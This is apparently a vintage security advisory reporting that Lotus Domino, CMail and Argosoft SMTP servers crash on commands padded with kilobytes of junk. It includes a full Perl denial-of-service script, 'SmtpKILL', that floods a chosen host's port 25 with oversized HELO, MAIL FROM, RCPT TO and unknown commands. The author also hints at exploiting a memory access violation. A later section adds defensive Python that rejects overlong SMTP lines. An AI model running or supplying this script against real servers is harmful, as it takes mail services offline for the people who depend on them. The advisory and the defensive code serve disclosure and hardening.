Many Windows-based SMTP servers have problems handling "mail from: 4k_junk" or just "4k_of_junk". Servers that tested vulnerable include Lotus Domino ESMTP Services running Version 5.0.3, the CMail Server version 2.4.6, and the Argosoft Mail Server version 1.2.1.0. Perl demonstration code included.
Some SMTP servers have problems handling "mail from: 4k_junk" or just "4k_of_junk".
Well, I tried this on:
* Lotus Domino ESMTP Services running Version 5.0.3 (Intl), and SMTP died,
also after mail from: someone@4k_junk
* Lotus Domino ESMTP version 5.0.2 (Intl) is also vulnerable to this.
* I also tried this against Version 5.0.2c (Intl) without success in DoS, so
I assume that 5.0.2c (Intl) is not vulnerable.
* Merak Server Version 2.10.270 is also not vulnerable.
* CMail Server version 2.4.6 is not vulnerable to mail from: someone@4k_junk
BUT is vulnerable to something_4k_junk! In fact this software even logs
"mail from: someone@4k_junk" as a DoS attempt but crashes when you just send
something_4k_junk!
* Argosoft Mail Server version 1.2.1.0 doesn't crash with "mail from:
someone@4k_junk" but after some messages it will log: Error: Access
violation at address 00459CBB in module 'MAILSERVER.EXE'. Read of address
FFFFFFFF, but it will continue to serve :) Maybe we could make something
funny with this overflow (?) ;)))
* Many others where I haven't tried this...?
I am attaching demonstration code (Perl) for those who want to check any other
servers that might be vulnerable to this.
smiler@vxd.org
#!/usr/bin/perl
# Need Net::Telnet to run
# Expl0it By smiler@vxd.org
# Tested with success against Lotus Notes 5.0.1, 5.0.2b, 5.0.3
# CMail Server version 2.4.6, Argosoft Mail Server version 1.2.1.0
# and probably many others that I hadn't a chance to explore.
# I wrote this after Michal Zalewski brought this issue up in BugTraq.
# Cheers 351 and FractalG :)
use strict;
use warnings;
use Net::Telnet;

print "SmtpKILL By smiler\@vxd.org\n";
if (not $ARGV[1]) {
print qq~
Usage : smtpkill.pl <type> <host>
<type> Type of attack :
type 1 = long mail from: someone\@4k_of_junk
type 2 = long rcpt to: someone\@4k_of_junk
type 3 = long helo longdomain_with_4k_of_junk
type 4 = long undefined command (4k_of_junk)
type 5 = long help 4k_of_junk
type 6 = long mail from: and mail to:
<host> Host that you want to DOS, Ip or Domain will be ok.
Example Usage : smtpkill.pl 5 127.0.0.1
~; exit;}
my $type=$ARGV[0];
my $target=$ARGV[1];
print "TYPE ATTACK: $type\n";
print "TARGET : $target\n";
# Each pass opens a fresh connection to port 25 and sends one command set.
# 'ptrulez' x $i repeats the 7-byte token $i times, so the oversized
# argument is roughly 28 KB on the first pass and grows by 7 bytes per pass.
for (my $i=4096;$i<5096;$i++)
{
my $obj=Net::Telnet->new( Host => $target, Port => 25);
# Lines a given type does not set are sent as bare CRLF.
my ($helo,$from,$rcpt)=("","","");
if ($type eq "1") {
$helo="helo ptrulez";
$from="mail from: v0v0\@". 'ptrulez' x $i;
$rcpt="rcpt to: v0v0\@v0v0.pt";
}
if ($type eq "2") {
$helo="helo ptrulez";
$from="mail from: v0v0\@v0v0.pt";
$rcpt="rcpt to: v0v0\@". 'ptrulez' x $i;
}
if ($type eq "3") {
$helo="helo ". 'ptrulez' x $i;
$from="mail from: v0v0\@v0v0.pt";
$rcpt="rcpt to: v0v0\@v0v0.pt";
}
if ($type eq "4") {
# Unknown verb followed by the junk, no space in between
$helo="havesomefun". 'ptrulez' x $i;
}
if ($type eq "5") {
$helo="help ". 'ptrulez' x $i;
}
if ($type eq "6") {
$helo="helo ptrulez";
$from="mail from: ". 'ptrulez' x $i;
$rcpt="rcpt to: ". 'ptrulez' x $i;
}
# Net::Telnet appends the line terminator to each print
print "$helo\n";$obj->print($helo);
print "$from\n";$obj->print($from);
print "$rcpt\n";$obj->print($rcpt);
$obj->close;
}
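The servers that crash here accept a command line of arbitrary length and parse it before bounding it. As an added defensive example that is not part of the original post, the following Python guard enforces the RFC 5321 section 4.5.3.1 size limits on a raw inbound line before it reaches the command parser; the reply strings, the KNOWN_VERBS set and the sample lines are my own constructed choices.

```python
# Added example (not from the original post): bound every inbound SMTP
# command line before any parsing so oversized HELO / MAIL / RCPT / unknown
# commands, like the ones the script above sends, get a reply instead of
# reaching length-sensitive code.

MAX_LINE = 512     # command line including CRLF (RFC 5321 4.5.3.1.6)
MAX_PATH = 256     # reverse-path / forward-path including <> (4.5.3.1.3)
MAX_DOMAIN = 255   # domain name (4.5.3.1.2)

# Verbs this guard lets through to the real parser (assumed minimal set)
KNOWN_VERBS = {b"HELO", b"EHLO", b"MAIL", b"RCPT", b"DATA", b"RSET",
               b"NOOP", b"QUIT", b"VRFY", b"EXPN", b"HELP"}


def check_command(raw: bytes):
    """Return (accepted, reply). accepted=True means the line is within
    limits and may be handed to the command parser; otherwise reply is
    the rejection the server should send back."""
    # Bound the whole line first: this alone stops every "4k of junk"
    # case, whatever verb it is attached to (or none at all, type 4).
    if len(raw) > MAX_LINE:
        return False, b"500 5.5.2 Line too long\r\n"
    line = raw.rstrip(b"\r\n")
    verb, _, arg = line.partition(b" ")
    verb = verb.upper()
    if verb in (b"MAIL", b"RCPT"):
        # "FROM:<path>" / "TO:<path>": bound the path before parsing it
        _, _, path = arg.partition(b":")
        if len(path.strip()) > MAX_PATH:
            return False, b"501 5.5.4 Path too long\r\n"
    elif verb in (b"HELO", b"EHLO"):
        if len(arg.strip()) > MAX_DOMAIN:
            return False, b"501 5.5.4 Domain name too long\r\n"
    elif verb not in KNOWN_VERBS:
        # Short enough to read, but not a command we know
        return False, b"500 5.5.1 Command unrecognized\r\n"
    return True, None


# Constructed sample lines mirroring the attack types in the script above
SAMPLE_LINES = [
    b"HELO example.test\r\n",
    b"MAIL FROM:<v0v0@" + b"a" * 5000 + b">\r\n",      # type 1 (oversized)
    b"MAIL FROM:<" + b"a" * 300 + b"@x.test>\r\n",      # long path, short line
    b"HELO " + b"b" * 260 + b"\r\n",                     # type 3 (long domain)
    b"havesomefun" + b"x" * 100 + b"\r\n",               # type 4 (no verb)
]

if __name__ == "__main__":
    for sample in SAMPLE_LINES:
        print(len(sample), check_command(sample))
```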